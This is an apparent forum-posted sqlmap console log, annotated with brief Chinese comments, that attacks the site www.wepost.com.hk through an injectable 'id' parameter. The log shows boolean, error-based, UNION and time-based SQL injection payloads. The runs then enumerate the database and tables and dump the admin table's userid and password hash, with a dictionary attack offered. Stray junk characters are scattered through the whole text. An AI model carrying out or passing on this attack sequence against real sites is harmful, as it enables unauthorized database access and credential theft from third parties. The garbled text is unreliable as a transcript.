D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- s$ M9 H* y4 a* F
ms "Mysql" --current-user /* 注解:获取当前用户名称6 g0 j m) Y1 ^! B1 Q/ O
sqlmap/0.9 - automatic SQL injection and database takeover tool# N) h3 }8 q+ T" B* ]) m/ A
http://sqlmap.sourceforge.net starting at: 16:53:54
3 W7 A _, B6 `[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% b( O _: O* l2 ] F0 i
session file3 |/ B) h# v: R- Y
[16:53:54] [INFO] resuming injection data from session file3 N) ^; O3 ?6 X4 |& `
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% P) F* y% a+ T- S+ b* v[16:53:54] [INFO] testing connection to the target url
! v# m. p/ b. h1 `1 @' vsqlmap identified the following injection points with a total of 0 HTTP(s) reque k! w q) A! C5 A# D$ {
sts:, F/ P5 w+ y8 C# e; k) N
---
* F! F1 ?" e* e: q4 BPlace: GET9 p- P# h; v5 t# k3 `9 T
Parameter: id G7 H7 m k2 w+ A" H8 ], ^: ~
Type: boolean-based blind
+ v* r7 ~: M: a R" i Title: AND boolean-based blind - WHERE or HAVING clause
% N: x2 P c: b# P Payload: id=276 AND 799=799
7 v% v, @( D, K9 N! W0 ^ Type: error-based, V! p0 W0 w. C$ o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' Y0 e& x0 C6 @ ~ B! X1 C" E# v
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 J0 ?* a* i) i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) b* y4 f$ ~- u+ @. W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ H# {1 H: c# y8 ` Type: UNION query
| ~( O% S% |: N1 D2 ? Title: MySQL UNION query (NULL) - 1 to 10 columns- K% x0 Z- C# U# U8 I0 n' D2 ]/ R
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 L' N1 `( O* l* v9 ^4 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# A B; l4 h6 b6 wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& C( O8 s2 U( `/ z; y) j6 v Type: AND/OR time-based blind0 m' i9 c. u7 P! d1 ]1 |
Title: MySQL > 5.0.11 AND time-based blind5 j7 q. V# u" k. z
Payload: id=276 AND SLEEP(5)( X& b# @8 |3 O$ b) l2 F B" ]" b
---
9 l* g+ I6 w0 A[16:53:55] [INFO] the back-end DBMS is MySQL
2 l# q3 b6 I, C, B7 Sweb server operating system: Windows
6 C/ L2 l2 |# q% s @! J& sweb application technology: Apache 2.2.11, PHP 5.3.0
& }# }" @$ `3 u9 ^) r! cback-end DBMS: MySQL 5.0+ A6 v/ o$ A+ |' N0 @
[16:53:55] [INFO] fetching current user
/ R/ `/ ^ q# H7 [7 xcurrent user: 'root@localhost' . c, B5 _0 g" e+ X
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: x% b7 `' t5 g. g/ ctput\www.wepost.com.hk' shutting down at: 16:53:58+ P/ R% s' c+ e# C& P7 f
7 E& l# S3 J+ e0 K4 p( a) TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ Y7 a% {, w* j& ]8 Q7 u! [2 x3 t) ems "Mysql" --current-db /*当前数据库* s! q0 A/ [7 r
sqlmap/0.9 - automatic SQL injection and database takeover tool
( R2 _5 a) ^- E! | http://sqlmap.sourceforge.net starting at: 16:54:167 t- X9 e% [, X, |, v
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ |2 {( s# k( S& d( B; z
session file5 [6 r. ? z- f0 `! q# w
[16:54:16] [INFO] resuming injection data from session file" X* }# c$ \* m( o" L2 h% s
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 Z! L: O4 e8 C6 Z6 t7 u' Z[16:54:16] [INFO] testing connection to the target url3 G1 B+ Q- I5 y0 g8 j9 B0 V( h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
* J- j' q' Y' t/ K" [6 Ists:
; o2 n$ l% K% Z% `" y---, W- b3 a1 H9 c' u% r3 E
Place: GET7 t- |% k# R1 F3 G
Parameter: id
: r0 ?* w8 C8 J& D$ D Type: boolean-based blind
8 }0 A7 W5 D0 R C Title: AND boolean-based blind - WHERE or HAVING clause: T% J! H O4 N6 Q- j- V7 T
Payload: id=276 AND 799=799
7 k$ v% t) i) N Type: error-based5 H# o/ i. w4 l; D' g: c, F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 p" _4 [) N4 l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. A. ^2 @4 N: d# i: k' X: m" ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 t, f7 o* c, r: y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 r; }) \) F/ `
Type: UNION query
5 m2 y3 x- s( p7 E+ d# [ Title: MySQL UNION query (NULL) - 1 to 10 columns
& n6 X& q9 m+ z/ C; X! R Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 ~0 Z6 a, i/ a+ V# @ C, G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ H' w; D2 ]! @- J
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 Y: h t" M+ |
Type: AND/OR time-based blind+ c3 k/ C$ D! E" F. ?# f- a
Title: MySQL > 5.0.11 AND time-based blind+ N A5 v9 b8 k; Z' y
Payload: id=276 AND SLEEP(5)0 t: T" X2 `4 P
---( @4 }: D' `& B: L y( ?
[16:54:17] [INFO] the back-end DBMS is MySQL
9 M$ y+ b' y9 f9 D8 D4 y2 l5 hweb server operating system: Windows q4 A {" Z5 `2 M$ x3 \3 \
web application technology: Apache 2.2.11, PHP 5.3.0
- g3 `- R Z) k# F5 [2 ?back-end DBMS: MySQL 5.07 S8 J8 T+ ]. C
[16:54:17] [INFO] fetching current database
1 b) M6 ^& n7 T N- \) L+ K! Y B8 icurrent database: 'wepost'( g& |# _ A7 E$ ?- _: v% ^
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 Q8 C; |/ A# F6 Y# c# ntput\www.wepost.com.hk' shutting down at: 16:54:18" Z, B6 e$ Q+ V L* }9 p8 L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. N3 h; r. Q. n8 r2 `& ^ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
, j7 H) e: M- U9 R0 G sqlmap/0.9 - automatic SQL injection and database takeover tool
) n t- X- {5 V http://sqlmap.sourceforge.net starting at: 16:55:25
# {. R) P* G$ n1 f, E& `, n0 n[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% q( S0 @+ C+ J
session file
# {. l/ w0 G6 d5 ]& m[16:55:25] [INFO] resuming injection data from session file9 F# v0 n1 b7 S8 ^6 @
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
. l# g9 w2 x& p2 [" S[16:55:25] [INFO] testing connection to the target url. X9 e+ I; {* T
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
* t7 P* U6 l/ jsts:' |4 N, B3 B2 r8 M& n7 C
---- |( ~" ~; y% j7 o
Place: GET [6 y. l# H$ E1 F9 Q1 E
Parameter: id
M9 V2 e- w/ R0 ^3 h7 c u Type: boolean-based blind
; ^ A+ x" f c+ G9 X8 A4 i Title: AND boolean-based blind - WHERE or HAVING clause
' j3 u$ O4 V( i3 e Payload: id=276 AND 799=7997 o0 x7 f% v" R' Z, H% B. g
Type: error-based% Z/ b, V3 @. Y! U+ o* h( A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 h+ j6 N1 T+ L, W; S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 x, u9 t* A8 b: w' M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- d5 B0 U Y9 C4 `5 J% i9 A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ v5 ~( o5 W/ o
Type: UNION query+ Q! y$ S" _0 [. e, y, n1 ^
Title: MySQL UNION query (NULL) - 1 to 10 columns4 e4 {, H3 o& S }" ^; n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 @5 e( A6 C/ C6 O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* w2 u( u: ~0 K3 I1 X: e) O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, @, b2 a c2 @6 b4 S
Type: AND/OR time-based blind( Q" X' V: B/ Z! w" _
Title: MySQL > 5.0.11 AND time-based blind
@7 v; A" K e Payload: id=276 AND SLEEP(5)
* W& j" l5 W# [! r---
: Q5 [+ P2 R( `) q[16:55:26] [INFO] the back-end DBMS is MySQL
( K3 E& l! q- o* F, C" Eweb server operating system: Windows
7 V' w& F; G+ `web application technology: Apache 2.2.11, PHP 5.3.0
& Z9 @& k+ G9 y8 Zback-end DBMS: MySQL 5.0
H& |" q& l# D3 k, X[16:55:26] [INFO] fetching tables for database 'wepost'# n1 p( R$ ^& M
[16:55:27] [INFO] the SQL query used returns 6 entries
+ E. r% S% d, n/ L7 ]5 s& Y6 wDatabase: wepost- D- E( ^% [" X, s
[6 tables]1 B; O7 [6 l3 ^9 a7 j' @( X
+-------------+
4 w: M8 D( Z! U }( ~| admin |4 i* L3 D% Q+ e
| article |) y2 W$ J! x/ {7 s& o W6 x& N
| contributor |
2 D; w! T5 A) v9 { D) q| idea |) A: a, [! H p7 n( @
| image |" M. w; b0 ^. h; U* T7 l5 Y5 T: I+ s
| issue |
$ Z5 x( K: N1 B) M+-------------+
' y8 [9 E& L, P: d% U[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ O, S1 @" a+ ~' Z0 otput\www.wepost.com.hk' shutting down at: 16:55:33
* _6 s6 `# n" g: n3 W; O( v* c7 H6 H8 P0 w: C4 h9 U, {; @7 L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# o, H3 \6 \ L9 z/ `
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
, w3 f8 A" Q# `& I7 I q sqlmap/0.9 - automatic SQL injection and database takeover tool% g" q! s* ^, t& C. Y
http://sqlmap.sourceforge.net starting at: 16:56:06
# G4 m+ I" S) ?7 }$ h+ Esqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 x- a. L; g! X) q5 S: d/ ?: Bsts:7 f: H4 L* C8 ^: z, x7 ?. K" l8 J
---
2 A' n. N/ A$ v. {3 q `' iPlace: GET8 L8 F7 ~( F7 r/ d. M9 P- v
Parameter: id
" E( N4 m5 D9 K Type: boolean-based blind
) S0 P. H! L' B, [ | Title: AND boolean-based blind - WHERE or HAVING clause# K* r) b" C$ h- _
Payload: id=276 AND 799=7991 @& v. b* M7 K: R' z3 Y! e
Type: error-based0 V k+ ? i$ g1 g) T# o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, J, \9 l) i0 c9 c$ ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( A, \% f( m5 x- Y) n Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' k; t& a7 O, j n, s# O" w
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 r ~, R! G" A. K) ?! T* Z
Type: UNION query2 |4 | O5 z2 H/ e0 k |+ N9 y
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ L, O+ \: v; g% x3 Y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. Y' N" [ A: \# V0 h
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: Q% ~4 r+ ` J7 ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# j, p2 ]4 }) G4 M4 v* S- K- ] Type: AND/OR time-based blind* d* ?4 P1 p! ?4 P: ]9 A
Title: MySQL > 5.0.11 AND time-based blind
" c7 D/ s0 W. A5 R3 L( h Payload: id=276 AND SLEEP(5)* w7 x7 l" w7 x: g5 L$ A
---
! X, |8 _4 u. w+ D1 oweb server operating system: Windows
q4 n5 a0 l9 e# R& j. Y! k( E8 Wweb application technology: Apache 2.2.11, PHP 5.3.05 M7 D3 L+ u. O; d( M
back-end DBMS: MySQL 5.0
6 ^9 p# Y& z* P: v1 g6 U5 [* v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
- y; u! t/ z# _8 J0 Dssion': wepost, wepost
( Y- c* q: v. k9 pDatabase: wepost
7 \) L4 y* ^# d- |& J0 xTable: admin
% c2 J/ {% K: `- D3 t, M[4 columns]
/ n; ^* ?3 q; E% H0 S- ~+----------+-------------+! S) u5 F n' ?
| Column | Type |+ b/ U$ V& T8 Q8 l; M5 b
+----------+-------------+
9 `$ i* m- e1 j0 Q! f0 |5 V5 T4 G: U" g| id | int(11) |$ D& o. @& ]' b8 J V$ ?9 p
| password | varchar(32) | P1 |" `1 _/ u& C' D" ^
| type | varchar(10) |' c& f6 d% H# e& h7 V, h
| userid | varchar(20) |
# s0 w" P6 m3 N8 a+----------+-------------+$ D/ K- Y* O! z6 N- O/ G
shutting down at: 16:56:19
N5 w% n# ?9 Q5 k4 `
8 J5 i0 T3 m- h# g& GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, E; T$ q2 V" K+ s4 Ims "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容$ _/ o( ]7 y' @2 M, _
sqlmap/0.9 - automatic SQL injection and database takeover tool: e u* {9 K* r {1 G
http://sqlmap.sourceforge.net starting at: 16:57:14: Y/ e7 C ~, F" _/ z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ x+ W% Y3 H9 {5 F( a; f2 lsts:" n' `/ h. U+ f/ I# y8 G: c
---3 I# o/ T* E; [ L
Place: GET
p7 x* l8 I' R4 I0 Z$ f2 NParameter: id9 ?1 |: t4 R6 J3 z7 q
Type: boolean-based blind
& Z; ~8 @# m3 ?/ J8 O Title: AND boolean-based blind - WHERE or HAVING clause7 \. E& y: ], `: ]+ C
Payload: id=276 AND 799=799
8 a7 ^! T+ y% S Type: error-based
# }5 H3 _5 g6 Y1 W t8 z4 f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ p0 @% j' U6 e, h$ R2 |4 S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 s3 A5 }+ r# q; a- b* W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ B' j0 C' A. |+ B) h7 G, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* d; v# E# m3 o. L0 o9 _3 W: f2 | Type: UNION query
7 f$ _- O( S5 {8 \1 s1 o Title: MySQL UNION query (NULL) - 1 to 10 columns
8 s/ i" t+ t) z. }- \# T2 Z/ C3 C/ ^ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) X6 h) D3 Q: c+ {5 o6 \8 q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ W( G' L8 ]$ T& d! J. UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 @' N' R: h2 ~% E0 |; c Type: AND/OR time-based blind
+ A- ~' g- k& ~: W, o( g, T* p Title: MySQL > 5.0.11 AND time-based blind# Z1 o# G8 S' ^3 i7 L6 G4 q* D% ^0 {
Payload: id=276 AND SLEEP(5)" K& g! I- K# g1 P& ^7 C# @
---, W8 C5 o) @; T" l+ H3 J6 t- D1 F
web server operating system: Windows3 ~0 C% w% [0 t- k* t/ T" ~( q+ M
web application technology: Apache 2.2.11, PHP 5.3.0
' b! z0 j& I, D( iback-end DBMS: MySQL 5.0) ~* i& h& p& Y& u( k
recognized possible password hash values. do you want to use dictionary attack o
, C) k& Z% C1 B2 `- yn retrieved table items? [Y/n/q] y
- v& R9 A8 o; N9 a, w0 `what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]+ C5 H0 V+ }% M: e: L$ n
do you want to use common password suffixes? (slow!) [y/N] y
0 y5 E# y' y' `- RDatabase: wepost
& W I" i, e% {( ?Table: admin
8 T* E: ?# {* f8 |[1 entry], u1 }/ o& ^$ [3 B
+----------------------------------+------------+
# A$ k) d4 O+ Z/ B: Z| password | userid |
# S, o. a* l y* K8 H- e+----------------------------------+------------+
$ @8 r8 @% n, o g( k9 p| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |% p. S$ k' |* d7 X6 G$ v8 o" k
+----------------------------------+------------+
. E- h% a/ [0 [- W) P0 b% _) I0 w& G shutting down at: 16:58:14% \6 }# F, L( r' W7 n# H
" O7 @) j3 C) e3 l' z fD:\Python27\sqlmap> |